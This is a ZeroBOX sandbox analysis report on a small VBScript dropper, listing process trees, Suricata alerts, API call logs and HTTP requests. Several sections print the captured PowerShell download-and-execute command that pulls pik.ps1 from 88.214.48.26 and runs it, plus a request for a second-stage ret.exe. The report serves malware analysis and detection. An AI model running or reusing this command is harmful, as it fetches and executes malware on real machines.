Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 28, 2025, 10:36 a.m.	April 28, 2025, 10:38 a.m.

Size	422.0B
Type	ASCII text, with CRLF line terminators
MD5	`fe71e84d826e568fb59858c87d53d966`
SHA256	`7e47bcb383783a85a27b91e7a862ccf291f9c836a708c784e9a1bb081f88f014`
CRC32	`BB184951`
ssdeep	`12:UhhUfOHjRZkAOo6GlIFeHzFkYPyPyLuB9:Uh/vkn5d2kyyX`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\nums.vbs
508
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$ax = New-Object Net.WebClient;$bx = $ax.DownloadString('http://88.214.48.26/tpnl98/pik.ps1');[ScriptBlock]::Create($bx).Invoke()"
  2068

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
88.214.48.26	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49164 -> 88.214.48.26:80	2032162	ET INFO PS1 Powershell File Request	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 88.214.48.26:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 88.214.48.26:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 88.214.48.26:80 -> 192.168.56.103:49164	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 88.214.48.26:80 -> 192.168.56.103:49164	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 88.214.48.26:80 -> 192.168.56.103:49164	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 28, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 28, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 28, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 28, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 28, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 28, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 28, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 28, 2025, 10:36 a.m.			0	0

Command line console output was observed (10 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 28, 2025, 10:36 a.m.	buffer: Exception calling "Invoke" with "1" argument(s): "Exception calling "Load" with console_handle: 0x00000023	1	1
WriteConsoleW April 28, 2025, 10:36 a.m.	buffer: "1" argument(s): "Could not load file or assembly '501664 bytes loaded from Sy console_handle: 0x0000002f	1	1
WriteConsoleW April 28, 2025, 10:36 a.m.	buffer: stem.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31 console_handle: 0x0000003b	1	1
WriteConsoleW April 28, 2025, 10:36 a.m.	buffer: bf3856ad364e35' or one of its dependencies. An attempt was made to load a progr console_handle: 0x00000047	1	1
WriteConsoleW April 28, 2025, 10:36 a.m.	buffer: am with an incorrect format."" console_handle: 0x00000053	1	1
WriteConsoleW April 28, 2025, 10:36 a.m.	buffer: At line:1 char:128 console_handle: 0x0000005f	1	1
WriteConsoleW April 28, 2025, 10:36 a.m.	buffer: + $ax = New-Object Net.WebClient;$bx = $ax.DownloadString('http://88.214.48.26/ console_handle: 0x0000006b	1	1
WriteConsoleW April 28, 2025, 10:36 a.m.	buffer: tpnl98/pik.ps1');[ScriptBlock]::Create($bx).Invoke <<<< () console_handle: 0x00000077	1	1
WriteConsoleW April 28, 2025, 10:36 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x00000083	1	1
WriteConsoleW April 28, 2025, 10:36 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x0000008f	1	1

Uses Windows APIs to generate a cryptographic key (48 events)

Time & API	Arguments	Status	Return
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007315c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007315c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007315c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00730dc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00730dc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00730dc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00730dc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00730dc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00730dc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007315c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007315c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007315c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731b40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731b40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731b40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731b40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731b40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731b40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731b40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731b40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731b40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731b40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00731980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00730f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00730f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00730f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00730f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00730f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00730f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00730f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00730f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 28, 2025, 10:36 a.m.		1	1	0

Powershell script has download & invoke calls (1 event)

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://88.214.48.26/tpnl98/pik.ps1
suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://88.214.48.26/tpnl98/ret.exe

Performs some HTTP requests (2 events)

request	GET http://88.214.48.26/tpnl98/pik.ps1
request	GET http://88.214.48.26/tpnl98/ret.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 155 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 1310720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02750000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02850000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72681000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72682000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02851000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02852000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02557000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02502000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02555000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02830000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02503000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02504000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02505000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02506000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02507000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02508000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02509000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:36 a.m.	process_identifier: 2068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$ax = New-Object Net.WebClient;$bx = $ax.DownloadString('http://88.214.48.26/tpnl98/pik.ps1');[ScriptBlock]::Create($bx).Invoke()"
